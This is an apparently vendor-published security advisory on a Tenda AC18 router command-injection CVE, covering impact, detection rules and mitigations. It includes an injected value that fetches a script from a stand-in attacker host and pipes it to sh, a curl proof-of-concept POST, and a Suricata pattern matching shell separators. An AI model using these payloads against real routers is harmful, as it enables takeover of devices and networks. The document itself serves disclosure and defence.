Tenda AC18 CVE-2026-31255: Unauthenticated RCE via SetSambaCfg

On April 27, 2026, a new CVE rated CVSS 9.8 was published against the Tenda AC18 router on firmware V15.03.05.05_multi. Located in the /goform/SetSambaCfg endpoint, the vulnerability lets an unauthenticated attacker execute arbitrary commands by injecting shell into the guestuser parameter. With the AC18 sold by the millions to consumers and small businesses, this flaw poses an immediate internet-scale risk.

Technical Details

The /goform/SetSambaCfg endpoint handles configuration for the router's built-in Samba server, used to share files from a USB stick. The guestuser parameter (Samba guest username) is concatenated directly into a shell command — typically a call to useradd or smbpasswd — with zero sanitization.

An attacker injects a shell payload into guestuser:

guestuser=guest;wget http://attacker/p.sh|sh;

The backend binary then runs the legitimate command followed by the payload, yielding the attacker a remote shell on the router as root.

Characteristics

Affected Products and Versions

As of writing, Tenda has not released a fixed firmware. Check the product support page and your fleet's CVE inventory regularly.

Exploitation and Impact

Attack vector

If the router admin interface is reachable from the internet — common when end users enable remote access — exploitation is trivial via a single HTTP POST request.

Post-compromise impact

• Full persistence: add root users, modify firmware
• LAN pivot: access every device behind the router (IP cameras, NAS, user endpoints)
• Botnet recruitment: Mirai and its variants actively target Tenda routers
• Credential theft: sniff internal traffic, DNS hijack for phishing
• Crypto-mining: leverage router resources to mine

Public PoC

curl -X POST "http://<router-ip>/goform/SetSambaCfg" \
  -d "guestuser=user;id>/tmp/pwn;"

No account needed. Any IP that can reach the admin interface compromises the router in under a second.

Detection and IOCs

On the network (upstream firewall, IDS)

# Suricata / Snort — detect shell payload on SetSambaCfg
alert http any any -> any any (msg:"Tenda AC18 SetSambaCfg command injection"; \
  flow:to_server,established; http.uri; content:"/goform/SetSambaCfg"; \
  http.request_body; pcre:"/guestuser=[^&]*[;&|`]/"; sid:2026031255; rev:1;)

On the router (with console access)

• Inspect ps, crontab, iptables for unexpected entries
• Examine /tmp/, /var/log/messages, /dev/shm
• Check Samba accounts via pdbedit -L

Network indicators

• Outbound connections to C2 servers (Mirai typically uses IRC or custom TCP)
• Abnormal DNS traffic (suspicious domain lookups)
• POST requests to /goform/SetSambaCfg from unknown external IPs

Mitigation

Priority action

1. Disable remote admin access from the internet
2. Disable Samba if you don't use file sharing: Settings → USB Application → Samba → Disable
3. Restrict LAN access to the admin panel to a single management IP

Temporary workaround

If you operate an upstream firewall, block any POST request containing shell separators to /goform/SetSambaCfg. If you have no upstream firewall but another router available, place the AC18 behind it as a simple AP (no NAT/firewall) and route through the upstream router.

Long-term solution

• Replace the device if Tenda doesn't release a patch in the weeks following disclosure
• Migrate to OpenWrt on supported models (check the OpenWrt support matrix before purchase)

Why Continuous Monitoring Matters

Consumer and SMB routers are a prime entry point for attackers: exposed to the internet, rarely patched, with short support cycles. Maintaining a current inventory with automatic alerts is the only way to catch a CVE like CVE-2026-31255 in time and prevent an end-of-life device from becoming the weak link.

With cveo.tech, inventory your routers and network gear and get automatic email alerts when a critical CVE targets one of your versions — so you can decide on patching or replacement before attackers do.